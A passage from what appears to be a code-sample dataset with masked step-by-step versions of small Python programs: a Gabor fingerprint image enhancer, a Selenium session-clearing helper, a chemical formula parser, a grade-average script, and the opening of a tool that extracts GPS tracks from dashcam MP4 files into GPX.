windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n freq, medfreq = ridge_freq(normim, mask, orientim, blksze, windsze,\n min_wave_length, max_wave_length)\n freq = medfreq * mask\n kx = ky = 0.65\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n return new_im < -3\n\n\ndef gabor_enhance(in_path, out_dir='./'):\n img = cv2.imread(in_path, 0)\n enhanced_img = image_enhance(img)\n enhanced_img = np.invert(enhanced_img)\n img = enhanced_img * 255\n base_image_name = os.path.splitext(os.path.basename(in_path))[0]\n prefix = base_image_name.split('_normal')[0]\n img_out = out_dir + prefix + '_enhanced.png'\n cv2.imwrite(img_out, img)\n return img_out\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\npython3\ndescription :Fingerprint image enhancement by using gabor\n\"\"\"\nimport os\nimport cv2\nimport math\nimport scipy\nimport numpy as np\nfrom scipy import signal\n\n\ndef normalise(img):\n normed = (img - np.mean(img)) / (np.std(img))\n return normed\n\n\ndef ridge_segment(im, blksze, thresh):\n rows, cols = im.shape\n im = normalise(im)\n new_rows = np.int(blksze * np.ceil(rows / blksze))\n new_cols = np.int(blksze * np.ceil(cols / blksze))\n\n padded_img = np.zeros((new_rows, new_cols))\n stddevim = np.zeros((new_rows, new_cols))\n\n padded_img[0:rows][:, 0:cols] = im\n\n for i in range(0, new_rows, blksze):\n for j in range(0, new_cols, blksze):\n block = padded_img[i:i + blksze][:, j:j + blksze]\n\n stddevim[i:i + blksze][:, j:j +\n blksze] = np.std(block) * np.ones(block.shape)\n\n stddevim = stddevim[0:rows][:, 0:cols]\n\n mask = stddevim > thresh\n\n mean_val = np.mean(im[mask])\n\n std_val = np.std(im[mask])\n\n normim = (im - mean_val) / (std_val)\n\n return (normim, mask)\n\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n # Calculate image gradients.\n sze = np.fix(6 * gradientsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n\n gauss = cv2.getGaussianKernel(np.int(sze), gradientsigma)\n f = gauss * gauss.T\n\n fy, fx = np.gradient(f) # Gradient of Gaussian\n Gx = signal.convolve2d(im, fx, mode='same')\n Gy = signal.convolve2d(im, fy, mode='same')\n\n Gxx = np.power(Gx, 2)\n Gyy = np.power(Gy, 2)\n Gxy = Gx * Gy\n\n # Now smooth the covariance data to perform a weighted summation of the data.\n\n sze = np.fix(6 * blocksigma)\n\n gauss = cv2.getGaussianKernel(np.int(sze), blocksigma)\n f = gauss * gauss.T\n\n Gxx = scipy.ndimage.convolve(Gxx, f)\n Gyy = scipy.ndimage.convolve(Gyy, f)\n Gxy = 2 * scipy.ndimage.convolve(Gxy, f)\n\n # Analytic solution of principal direction\n denom = np.sqrt(np.power(Gxy, 2) + np.power((Gxx - Gyy), 2)\n ) + np.finfo(float).eps\n\n sin2theta = Gxy / denom # Sine and cosine of doubled angles\n cos2theta = (Gxx - Gyy) / denom\n\n if orientsmoothsigma:\n sze = np.fix(6 * orientsmoothsigma)\n if np.remainder(sze, 2) == 0:\n sze = sze + 1\n gauss = cv2.getGaussianKernel(np.int(sze), orientsmoothsigma)\n f = gauss * gauss.T\n # Smoothed sine and cosine of\n cos2theta = scipy.ndimage.convolve(cos2theta, f)\n sin2theta = scipy.ndimage.convolve(sin2theta, f) # doubled angles\n\n orientim = np.pi / 2 + np.arctan2(sin2theta, cos2theta) / 2\n return (orientim)\n\n\ndef frequest(im, orientim, windsze, minWaveLength, maxWaveLength):\n rows, cols = np.shape(im)\n\n # Find mean orientation within the block. This is done by averaging the\n # sines and cosines of the doubled angles before reconstructing the\n # angle again. This avoids wraparound problems at the origin.\n\n cosorient = np.mean(np.cos(2 * orientim))\n sinorient = np.mean(np.sin(2 * orientim))\n orient = math.atan2(sinorient, cosorient) / 2\n\n # Rotate the image block so that the ridges are vertical\n\n # ROT_mat = cv2.getRotationMatrix2D((cols/2,rows/2),orient/np.pi*180 + 90,1)\n # rotim = cv2.warpAffine(im,ROT_mat,(cols,rows))\n rotim = scipy.ndimage.rotate(\n im, orient / np.pi * 180 + 90, axes=(1, 0), reshape=False, order=3, mode='nearest')\n\n # Now crop the image so that the rotated image does not contain any\n # invalid regions. This prevents the projection down the columns\n # from being mucked up.\n\n cropsze = int(np.fix(rows / np.sqrt(2)))\n offset = int(np.fix((rows - cropsze) / 2))\n rotim = rotim[offset:offset + cropsze][:, offset:offset + cropsze]\n\n # Sum down the columns to get a projection of the grey values down\n # the ridges.\n\n proj = np.sum(rotim, axis=0)\n dilation = scipy.ndimage.grey_dilation(\n proj, windsze, structure=np.ones(windsze))\n\n temp = np.abs(dilation - proj)\n\n peak_thresh = 2\n\n maxpts = (temp < peak_thresh) & (proj > np.mean(proj))\n maxind = np.where(maxpts)\n\n rows_maxind, cols_maxind = np.shape(maxind)\n\n # Determine the spatial frequency of the ridges by divinding the\n # distance between the 1st and last peaks by the (No of peaks-1). If no\n # peaks are detected, or the wavelength is outside the allowed bounds,\n # the frequency image is set to 0\n\n if cols_maxind < 2:\n freqim = np.zeros(im.shape)\n else:\n NoOfPeaks = cols_maxind\n waveLength = (maxind[0][cols_maxind - 1] - maxind[0][0]) / (NoOfPeaks - 1)\n if waveLength >= minWaveLength and waveLength <= maxWaveLength:\n freqim = 1 / np.double(waveLength) * np.ones(im.shape)\n else:\n freqim = np.zeros(im.shape)\n\n return freqim\n\n\ndef ridge_freq(im, mask, orient, blksze, windsze, minWaveLength, maxWaveLength):\n rows, cols = im.shape\n freq = np.zeros((rows, cols))\n\n for r in range(0, rows - blksze, blksze):\n for c in range(0, cols - blksze, blksze):\n blkim = im[r:r + blksze][:, c:c + blksze]\n blkor = orient[r:r + blksze][:, c:c + blksze]\n\n freq[r:r + blksze][:, c:c +\n blksze] = frequest(blkim, blkor, windsze, minWaveLength, maxWaveLength)\n\n freq = freq * mask\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n\n ind = np.array(ind)\n ind = ind[1, :]\n\n non_zero_elems_in_freq = freq_1d[0][ind]\n\n meanfreq = np.mean(non_zero_elems_in_freq)\n # does not work properly\n medianfreq = np.median(non_zero_elems_in_freq)\n return freq, meanfreq\n\n\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3\n im = np.double(im)\n rows, cols = im.shape\n new_im = np.zeros((rows, cols))\n\n freq_1d = np.reshape(freq, (1, rows * cols))\n ind = np.where(freq_1d > 0)\n\n ind = np.array(ind)\n ind = ind[1, :]\n\n # Round the array of frequencies to the nearest 0.01 to reduce the\n # number of distinct frequencies we have to deal with.\n\n non_zero_elems_in_freq = freq_1d[0][ind]\n non_zero_elems_in_freq = np.double(\n np.round((non_zero_elems_in_freq * 100))) / 100\n\n unfreq = np.unique(non_zero_elems_in_freq)\n\n # Generate filters corresponding to these distinct frequencies and\n # orientations in 'angleInc' increments.\n\n sigmax = 1 / unfreq[0] * kx\n sigmay = 1 / unfreq[0] * ky\n\n sze = np.round(3 * np.max([sigmax, sigmay]))\n\n x, y = np.meshgrid(np.linspace(-sze, sze, (2 * sze + 1)),\n np.linspace(-sze, sze, (2 * sze + 1)))\n\n reffilter = np.exp(-((np.power(x, 2)) / (sigmax * sigmax) + (np.power(y, 2)) / (sigmay * sigmay))\n ) * np.cos(2 * np.pi * unfreq[0] * x) # this is the original gabor filter\n\n filt_rows, filt_cols = reffilter.shape\n\n gabor_filter = np.array(np.zeros((180 // angleInc, filt_rows, filt_cols)))\n\n for o in range(0, 180 // angleInc):\n # Generate rotated versions of the filter. Note orientation\n # image provides orientation *along* the ridges, hence +90\n # degrees, and imrotate requires angles +ve anticlockwise, hence\n # the minus sign.\n\n rot_filt = scipy.ndimage.rotate(reffilter, -(o * angleInc + 90), reshape=False)\n gabor_filter[o] = rot_filt\n\n # Find indices of matrix points greater than maxsze from the image\n # boundary\n\n maxsze = int(sze)\n\n temp = freq > 0\n validr, validc = np.where(temp)\n\n temp1 = validr > maxsze\n temp2 = validr < rows - maxsze\n temp3 = validc > maxsze\n temp4 = validc < cols - maxsze\n\n final_temp = temp1 & temp2 & temp3 & temp4\n\n finalind = np.where(final_temp)\n\n # Convert orientation matrix values from radians to an index value\n # that corresponds to round(degrees/angleInc)\n\n maxorient_index = np.round(180 / angleInc)\n orient_index = np.round(orient / np.pi * 180 / angleInc)\n\n # do the filtering\n\n for i in range(0, rows):\n for j in range(0, cols):\n if orient_index[i][j] < 1:\n orient_index[i][j] = orient_index[i][j] + maxorient_index\n if orient_index[i][j] > maxorient_index:\n orient_index[i][j] = orient_index[i][j] - maxorient_index\n finalind_rows, finalind_cols = np.shape(finalind)\n sze = int(sze)\n for k in range(0, finalind_cols):\n r = validr[finalind[0][k]]\n c = validc[finalind[0][k]]\n\n img_block = im[r - sze:r + sze + 1][:, c - sze:c + sze + 1]\n\n new_im[r][c] = np.sum(\n img_block * gabor_filter[int(orient_index[r][c]) - 1])\n\n return new_im\n\n\ndef image_enhance(img):\n blksze = 16\n thresh = 0.1\n # normalise the image and find a ROI\n normim, mask = ridge_segment(img, blksze, thresh)\n\n gradientsigma = 1\n blocksigma = 7\n orientsmoothsigma = 7\n # find orientation of every pixel\n orientim = ridge_orient(normim, gradientsigma,\n blocksigma, orientsmoothsigma)\n\n blksze = 38\n windsze = 5\n min_wave_length = 5\n max_wave_length = 15\n # find the overall frequency of ridges\n freq, medfreq = ridge_freq(\n normim, mask, orientim, blksze, windsze, min_wave_length, max_wave_length)\n\n freq = medfreq * mask\n kx = ky = 0.65\n # create gabor filter and do the actual filtering\n new_im = ridge_filter(normim, orientim, freq, kx, ky)\n\n return (new_im < -3)\n\n\ndef gabor_enhance(in_path, out_dir='./'):\n img = cv2.imread(in_path, 0)\n enhanced_img = image_enhance(img)\n enhanced_img = np.invert(enhanced_img)\n # print('saving the image')\n img = enhanced_img * 255\n base_image_name = os.path.splitext(os.path.basename(in_path))[0]\n prefix = base_image_name.split('_normal')[0]\n img_out = out_dir + prefix + '_enhanced.png'\n # img.save(base_image_name + \"_enhanced.png\", \"PNG\")\n cv2.imwrite(img_out, img)\n return img_out\n\n\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LocationNotSet(Exception):
pass
<|reserved_special_token_1|>
def clear_firefox_driver_session(firefox_driver):
firefox_driver.delete_all_cookies()
firefox_driver.execute_script('window.localStorage.clear();')
firefox_driver.execute_script('window.sessionStorage.clear();')
class LocationNotSet(Exception):
pass
<|reserved_special_token_1|>
def clear_firefox_driver_session(firefox_driver):
firefox_driver.delete_all_cookies()
# Note this only works if the browser is set to a location.
firefox_driver.execute_script('window.localStorage.clear();')
firefox_driver.execute_script('window.sessionStorage.clear();')
class LocationNotSet(Exception):
pass
|
flexible
|
{
"blob_id": "6d0b9523668bd0b302fdbc196d3d7ff25be10b23",
"index": 5045,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LocationNotSet(Exception):\n pass\n",
"step-3": "def clear_firefox_driver_session(firefox_driver):\n firefox_driver.delete_all_cookies()\n firefox_driver.execute_script('window.localStorage.clear();')\n firefox_driver.execute_script('window.sessionStorage.clear();')\n\n\nclass LocationNotSet(Exception):\n pass\n",
"step-4": "def clear_firefox_driver_session(firefox_driver):\n firefox_driver.delete_all_cookies()\n # Note this only works if the browser is set to a location.\n firefox_driver.execute_script('window.localStorage.clear();')\n firefox_driver.execute_script('window.sessionStorage.clear();')\n\n\nclass LocationNotSet(Exception):\n pass\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import re
def molecule_to_list(molecule: str) -> list:
"""Splits up a molucule into elements and amount in order of appearance
Args:
molecule (str): The molecule to split up
Raises:
ValueError: If molecule starts with a lower case letter
ValueError: If molecule contains a non-alphanumeric character
ValueError: If an element starts with a lower case letter
Returns:
list: A list of tuples containing the element symbol and the number of
its appearances at that position
"""
if molecule[0].islower():
raise ValueError
# Test if molecule contains non-alphanumeric characters
if re.match(r"^[\w]+$", molecule) is None:
raise ValueError
result = []
# Split molecule into elements and amounts
elements = re.findall(r"([A-Z][a-z]?|[a-z]{1,2})(\d{1,2})?", molecule)
for element in elements:
if element[0].islower():
raise ValueError
# Ensure the result has a numerical value
if element[1] == '':
result.append((element[0], 1))
else:
result.append((element[0], int(element[1])))
return result
|
normal
|
{
"blob_id": "a14a1803a0bae755803c471b12035398de262dbc",
"index": 9138,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef molecule_to_list(molecule: str) ->list:\n \"\"\"Splits up a molucule into elements and amount in order of appearance\n\n Args:\n molecule (str): The molecule to split up\n\n Raises:\n ValueError: If molecule starts with a lower case letter\n ValueError: If molecule contains a non-alphanumeric character\n ValueError: If an element starts with a lower case letter\n\n Returns:\n list: A list of tuples containing the element symbol and the number of\n its appearances at that position\n \"\"\"\n if molecule[0].islower():\n raise ValueError\n if re.match('^[\\\\w]+$', molecule) is None:\n raise ValueError\n result = []\n elements = re.findall('([A-Z][a-z]?|[a-z]{1,2})(\\\\d{1,2})?', molecule)\n for element in elements:\n if element[0].islower():\n raise ValueError\n if element[1] == '':\n result.append((element[0], 1))\n else:\n result.append((element[0], int(element[1])))\n return result\n",
"step-3": "import re\n\n\ndef molecule_to_list(molecule: str) ->list:\n \"\"\"Splits up a molucule into elements and amount in order of appearance\n\n Args:\n molecule (str): The molecule to split up\n\n Raises:\n ValueError: If molecule starts with a lower case letter\n ValueError: If molecule contains a non-alphanumeric character\n ValueError: If an element starts with a lower case letter\n\n Returns:\n list: A list of tuples containing the element symbol and the number of\n its appearances at that position\n \"\"\"\n if molecule[0].islower():\n raise ValueError\n if re.match('^[\\\\w]+$', molecule) is None:\n raise ValueError\n result = []\n elements = re.findall('([A-Z][a-z]?|[a-z]{1,2})(\\\\d{1,2})?', molecule)\n for element in elements:\n if element[0].islower():\n raise ValueError\n if element[1] == '':\n result.append((element[0], 1))\n else:\n result.append((element[0], int(element[1])))\n return result\n",
"step-4": "import re\n\n\ndef molecule_to_list(molecule: str) -> list:\n \"\"\"Splits up a molucule into elements and amount in order of appearance\n\n Args:\n molecule (str): The molecule to split up\n\n Raises:\n ValueError: If molecule starts with a lower case letter\n ValueError: If molecule contains a non-alphanumeric character\n ValueError: If an element starts with a lower case letter\n\n Returns:\n list: A list of tuples containing the element symbol and the number of\n its appearances at that position\n \"\"\"\n if molecule[0].islower():\n raise ValueError\n # Test if molecule contains non-alphanumeric characters\n if re.match(r\"^[\\w]+$\", molecule) is None:\n raise ValueError\n result = []\n # Split molecule into elements and amounts\n elements = re.findall(r\"([A-Z][a-z]?|[a-z]{1,2})(\\d{1,2})?\", molecule)\n for element in elements:\n if element[0].islower():\n raise ValueError\n # Ensure the result has a numerical value\n if element[1] == '':\n result.append((element[0], 1))\n else:\n result.append((element[0], int(element[1])))\n return result\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if media >= 6:
print('Parabéns!! Você foi aprovado.')
else:
print('Que pena!! Você foi reprovado.')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
nota1 = float(input('Digite sua primeira nota: '))
nota2 = float(input('Digite sua segunda nota: '))
nota3 = float(input('Digite sua terceira nota: '))
media = (nota1 + nota2 + nota3) / 3
if media >= 6:
print('Parabéns!! Você foi aprovado.')
else:
print('Que pena!! Você foi reprovado.')
<|reserved_special_token_1|>
"""
Faça um algoritmo que solicita ao usuário as notas de três provas. Calcule a média aritmética e
informe se o aluno foi Aprovado ou Reprovado (o aluno é considerado aprovado com a média igual ou superior a 6).
"""
nota1 = float(input("Digite sua primeira nota: "))
nota2 = float(input("Digite sua segunda nota: "))
nota3 = float(input("Digite sua terceira nota: "))
media = (nota1 + nota2 + nota3)/3
if media >= 6:
print("Parabéns!! Você foi aprovado.")
else:
print("Que pena!! Você foi reprovado.")
|
flexible
|
{
"blob_id": "033d1b39dd3ebaa81c8c6c52386909acf076ef47",
"index": 2011,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif media >= 6:\n print('Parabéns!! Você foi aprovado.')\nelse:\n print('Que pena!! Você foi reprovado.')\n",
"step-3": "<mask token>\nnota1 = float(input('Digite sua primeira nota: '))\nnota2 = float(input('Digite sua segunda nota: '))\nnota3 = float(input('Digite sua terceira nota: '))\nmedia = (nota1 + nota2 + nota3) / 3\nif media >= 6:\n print('Parabéns!! Você foi aprovado.')\nelse:\n print('Que pena!! Você foi reprovado.')\n",
"step-4": "\"\"\"\r\nFaça um algoritmo que solicita ao usuário as notas de três provas. Calcule a média aritmética e\r\ninforme se o aluno foi Aprovado ou Reprovado (o aluno é considerado aprovado com a média igual ou superior a 6).\r\n\"\"\"\r\n\r\nnota1 = float(input(\"Digite sua primeira nota: \"))\r\nnota2 = float(input(\"Digite sua segunda nota: \"))\r\nnota3 = float(input(\"Digite sua terceira nota: \"))\r\n\r\nmedia = (nota1 + nota2 + nota3)/3\r\n\r\nif media >= 6:\r\n print(\"Parabéns!! Você foi aprovado.\")\r\nelse:\r\n print(\"Que pena!! Você foi reprovado.\")\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python3
import re
import datetime
import math
import pathlib
import os
import io
import argparse
import subprocess
import xml.sax.saxutils
from typing import (Optional, List, Iterable)
import sys
_DEFAULT_TRACK_TYPE = 'Dashcam track'
class Arguments(object):
def __init__(self):
parser = argparse.ArgumentParser(
prog='papago2gpx', description='Extract GPS data from MP4 video\
files created by PAPAGO! dashcams, and format them into a GPX file.')
parser.add_argument('input_paths', nargs='+',
help='The path to an input file or directory.',
metavar='INPUT_PATH')
parser.add_argument('--name', help='The name of the GPX file to\
output. Default to 16 deciaml digits representing the first GPS record time.',
metavar='NAME')
parser.add_argument('--description', help='The description of the GPX\
file to output.', metavar='DESCRIPTION')
parser.add_argument('--author-name', help='The name of the author of\
the GPX file to output.', metavar='AUTHOR_NAME')
parser.add_argument('--author-email', help='The Email address of the\
author of the GPX file to output.', metavar='AUTHOR_EMAIL')
parser.add_argument('--copyright', help="The copyright holder of the\
GPX file to output. Default to `AUTHOR_NAME'.", metavar='COPYRIGHT')
parser.add_argument('--copyright-year', help="The copyright year of\
the GPX file to output. Default to the year the file is created.",
metavar='COPYRIGHT_YEAR')
parser.add_argument('--copyright-license', help='A link to an external\
file containing license text.', metavar='LICENSE')
parser.add_argument('--keywords', help='Keywords associated with the\
GPX file to output.', metavar='KEYWORDS')
parser.add_argument('--track-name', help='The name of the track.',
metavar='TRACK_NAME')
parser.add_argument(
'--track-comment', help='The comment of the track.',
metavar='TRACK_COMMENT')
parser.add_argument('--track-description', help="The description of\
the track.", metavar='TRACK_DESCRIPTION')
parser.add_argument(
'--track-type', default=_DEFAULT_TRACK_TYPE,
help=f"The type of the track. Default to `{_DEFAULT_TRACK_TYPE}'.")
parser.add_argument('--uniq', choices=['first', 'last'],
help='How to process different coordinates\
recorded at the same timestamp. Default to an error.')
parser.add_argument('--overwrite', action='store_true',
help='Allow to overwrite an existing file.')
args = parser.parse_args()
self._input_paths = []
for input_path in args.input_paths:
input_path = pathlib.Path(input_path)
if not input_path.exists():
print(f"{input_path}: File does not exist.", file=sys.stderr)
sys.exit(1)
self._input_paths.append(input_path)
self._name = args.name
self._description = args.description
self._author_name = args.author_name
self._author_email = args.author_email
self._copyright = args.copyright
if self._copyright is None and self._author_name is not None:
self._copyright = self._author_name
self._copyright_year = args.copyright_year
if self._copyright_year is not None and self._copyright is None:
print("`--copyright-year' is specified, but `--copyright' is not.",
file=sys.stderr)
sys.exit(1)
if self._copyright_year is None and self._copyright is not None:
utc_now = datetime.datetime.now(datetime.timezone.utc)
local_aware_now = utc_now.astimezone()
self._copyright_year = local_aware_now.year
self._copyright_license = args.copyright_license
if self._copyright_license is not None and self._copyright is None:
print("`--copyright-license' is specified, but `--copyright' is\
not.", file=sys.stderr)
sys.exit(1)
self._keywords = args.keywords
self._track_name = args.track_name
self._track_comment = args.track_comment
self._track_description = args.track_description
self._track_type = args.track_type
if self._track_type is None:
self._track_type = _DEFAULT_TRACK_TYPE
if self._track_type == '':
self._track_type = None
self._how_to_unique = args.uniq
self._overwrite = args.overwrite
@property
def input_paths(self) -> List[pathlib.Path]:
return self._input_paths
@property
def name(self) -> Optional[str]:
return self._name
@property
def description(self) -> Optional[str]:
return self._description
@property
def author_name(self) -> Optional[str]:
return self._author_name
@property
def author_email(self) -> Optional[str]:
return self._author_email
@property
def copyright(self) -> Optional[str]:
return self._copyright
@property
def copyright_year(self) -> Optional[int]:
return self._copyright_year
@property
def copyright_license(self) -> Optional[str]:
return self._copyright_license
@property
def keywords(self) -> Optional[str]:
return self._keywords
@property
def track_name(self) -> Optional[str]:
return self._track_name
@property
def track_comment(self) -> Optional[str]:
return self._track_comment
@property
def track_description(self) -> Optional[str]:
return self._track_description
@property
def track_type(self) -> Optional[str]:
return self._track_type
@property
def how_to_unique(self) -> str:
return self._how_to_unique
@property
def overwrite(self) -> bool:
return self._overwrite
class BrokenMp4FileError(RuntimeError):
def __init__(self, message: str):
super().__init__(message)
class GpsDataError(RuntimeError):
def __init__(self, message: str):
super().__init__(message)
class GpsDataBlockIndex(object):
def __init__(self, position: int, size: int):
if position <= 0:
raise ValueError(f"An invalid position: `{position}'.")
if size <= 0:
raise ValueError(f"An invalid size: `{size}'.")
self._position = position
self._size = size
@property
def position(self) -> int:
return self._position
@property
def size(self) -> int:
return self._size
def get_gps_data_block_indices(mp4_file: io.FileIO) -> List[GpsDataBlockIndex]:
target_box_path = ['moov', 'gps ']
while True:
box_size = mp4_file.read(4)
if len(box_size) == 0:
raise GpsDataError(
f'{mp4_file.name}: Could not find any GPS data block index.')
if len(box_size) < 4:
error_position = format(mp4_file.tell() - len(box_size), '#010x')
raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\
Expect the size of a box, but got EOF.')
box_size = int.from_bytes(box_size, 'big')
box_type = mp4_file.read(4)
if len(box_type) < 4:
error_position = format(mp4_file.tell() - len(box_type), '#010x')
raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\
Expect the type of a box, but got EOF.')
box_type = box_type.decode('UTF-8')
if box_size == 0:
box_size = None
next_position = None
elif box_size == 1:
box_size = mp4_file.read(8)
if len(box_size) < 8:
error_position = format(mp4_file.tell() - len(box_size),
'#010x')
raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\
Expect the size of a box, but got EOF.')
box_size = int.from_bytes(box_size, 'big')
next_position = mp4_file.tell() + box_size - 16
else:
next_position = mp4_file.tell() + box_size - 8
if box_type == target_box_path[0]:
target_box_path.pop(0)
if len(target_box_path) == 0:
break
else:
if next_position is None:
raise GpsDataError(f'{mp4_file.name}: Could not find any GPS'
' data block index.')
mp4_file.seek(next_position)
if mp4_file.tell() != next_position:
raise BrokenMp4FileError(f'{mp4_file.name}: The size of a box\
is not equal to the actual one.')
unknown = mp4_file.read(4)
if len(unknown) < 4:
error_position = format(mp4_file.tell() - len(unknown), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a'
' big-endian 32-bit unsigned integer, but got EOF.')
unknown = int.from_bytes(unknown, 'big')
if unknown != 257:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect a\
big-endian 32-bit unsigned integer with value `257', but got `{unknown}'.")
gps_data_block_count = mp4_file.read(4)
if len(gps_data_block_count) < 4:
error_position = format(mp4_file.tell() - len(gps_data_block_count),
'#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a'
' big-endian 32-bit unsigned integer, but got EOF.')
gps_data_block_count = int.from_bytes(gps_data_block_count, 'big')
gps_data_block_indices = []
for i in range(gps_data_block_count):
position = mp4_file.read(4)
if len(position) < 4:
error_position = format(mp4_file.tell() - len(position), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect the'
' position of a GPS data block, but got EOF.')
position = int.from_bytes(position, 'big')
if position < 0:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect the\
position of a GPS data block, but got an invalid value `{position}'.")
size = mp4_file.read(4)
if len(size) < 4:
error_position = format(mp4_file.tell() - len(size), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect the'
' size of a GPS data block, but got EOF.')
size = int.from_bytes(size, 'big')
if size < 0:
error_position = format(mp4_file.tell() - 4, '#010x')
raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect the\
size of a GPS data block, but got an invalid value `{size}'.")
if position == 0 or size == 0:
print(f'{mp4_file.name}: Warning: The index of GPS data blocks is\
not recorded.', file=sys.stderr)
else:
gps_data_block_index = GpsDataBlockIndex(position, size)
gps_data_block_indices.append(gps_data_block_index)
if mp4_file.tell() != next_position:
error_position = format(mp4_file.tell(), '#010x')
raise GpsDataError(f'{mp4_file_path}:{error_position}: Expect EOF, but'
' find additional data.')
return gps_data_block_indices
def read_little_endian_single(mp4_file: io.FileIO) -> float:
data = mp4_file.read(4)
if len(data) < 4:
error_position = format(mp4_file.tell() - len(data), '#010x')
raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a\
little-endian single-precision floating point number, but got EOF.')
data = int.from_bytes(data, 'little')
sign = (data & 0x80000000) >> 31
exponent = ((data & 0x7F800000) >> 23) - 127
mantissa = (data & 0x007FFFFF) | 0x00800000
sign = '+' if sign == 0 else '-'
exponent = str(exponent - 23)
mantissa_hex = format(mantissa, '08x')
return float.fromhex(f'{sign}0x{mantissa_hex}p{exponent}')
class Time(object):
def __init__(self, time: datetime.datetime):
if time.tzinfo is None:
raise ValueError(
"Expect an aware `datetime' object, but got naive one.")
self._time = time.astimezone(datetime.timezone.utc)
def as_local_time(self) -> datetime.datetime:
return self._time.astimezone()
def __repr__(self) -> str:
result = self._time.strftime("%Y-%m-%dT%H:%M:%S%z")
return re.sub('(\\+\\d{2})(\\d{2})$', '\\1:\\2', result)
def __lt__(self, other) -> bool:
return self._time < other._time
def __eq__(self, other) -> bool:
return self._time == other._time
class Latitude(object):
def __init__(self, degree: float):
if degree < -90 or 90 < degree:
raise ValueError("An invalid latitude degree: `{degree}'.")
self._degree = degree
def __repr__(self) -> str:
return format(self._degree, '.6F')
def __lt__(self, other) -> bool:
return self._degree < other._degree
def __eq__(self, other) -> bool:
return self._degree == other._degree
class Longitude(object):
def __init__(self, degree: float):
if degree < -180 or 180 < degree:
raise ValueError("An invalid longitude degree: `{degree}'.")
self._degree = degree
def __repr__(self) -> str:
return format(self._degree, '.6F')
def __lt__(self, other) -> bool:
return self._degree < other._degree
def __eq__(self, other) -> bool:
return self._degree == other._degree
class Speed(object):
def __init__(self, meter_per_second: float):
self._meter_per_second = meter_per_second
def __repr__(self) -> str:
return format(self._meter_per_second, '.2F')
class Azimuth(object):
def __init__(self, degree: float):
if degree < 0 or 360 <= degree:
raise ValueError(f"An invalid azimuth degree: `{degree}'.")
self._degree = degree
def __repr__(self) -> str:
return format(self._degree, '.2F')
class TrackPoint(object):
def __init__(self, time: Time, status: str, latitude: Optional[Latitude],
longitude: Optional[Longitude], speed: Speed,
azimuth: Azimuth, x_acceleration: int, y_acceleration: int,
z_acceleration: int):
if (status == 'V' or status is None) != (latitude is None):
raise ValueError('Inconsistent arguments:'
f' status = {status}, latitude = {latitude}')
if (status == 'V' or status is None) != (longitude is None):
raise ValueError('Inconsistent arguments:'
f' status = {status}, longitude = {longitude}')
self._time = time
self._status = status
self._latitude = latitude
self._longitude = longitude
self._speed = speed
self._azimuth = azimuth
self._x_acceleration = x_acceleration
self._y_acceleration = y_acceleration
self._z_acceleration = z_acceleration
@property
def time(self) -> Time:
return self._time
@property
def status(self) -> str:
return self._status
@property
def latitude(self) -> Optional[Latitude]:
return self._latitude
@property
def longitude(self) -> Optional[Longitude]:
return self._longitude
@property
def speed(self) -> Speed:
return self._speed
@property
def azimuth(self) -> Azimuth:
return self._azimuth
@property
def x_acceleration(self) -> int:
return self._x_acceleration
@property
def y_acceleration(self) -> int:
return self._y_acceleration
@property
def z_acceleration(self) -> int:
return self._z_acceleration
@property
def name(self) -> str:
local_time = self._time.as_local_time()
return local_time.strftime('%Y%m%d%H%M%S')
def format_as_csv(self) -> str:
if self._time is not None:
local_time = self._time.as_local_time()
result = local_time.strftime('%Y/%m/%d %H:%M:%S')
else:
result = ''
status = self._status if self._status is not None else ''
result += f',{status}'
latitude = str(self._latitude) if self._latitude is not None else ''
result += f',{latitude}'
longitude = str(self._longitude) if self._longitude is not None else ''
result += f',{longitude}'
result += f',{self._speed}'
result += f',{self._azimuth}'
result += f',{self._x_acceleration}'
result += f',{self._y_acceleration}'
result += f',{self._z_acceleration}'
return result
def __repr__(self) -> str:
latitude = str(self._latitude) if self._latitude is not None else ''
longitude = str(self._longitude) if self._longitude is not None else ''
return f'{self._time},{latitude},{longitude}'
def __lt__(self, other) -> bool:
return self._time < other._time
def __eq__(self, other) -> bool:
return self._time == other._time and self._latitude == other._latitude\
and self._longitude == other._longitude
class TrackSegment(object):
def __init__(self):
self._track_points = []
def append_track_point(self, track_point: TrackPoint) -> None:
self._track_points.append(track_point)
def __len__(self) -> int:
return len(self._track_points)
def __iter__(self) -> Iterable[TrackPoint]:
return iter(self._track_points)
_UNKNOWN_BYTES\
= b'\x00\x21\x17\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\xBC\xC7\x17\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
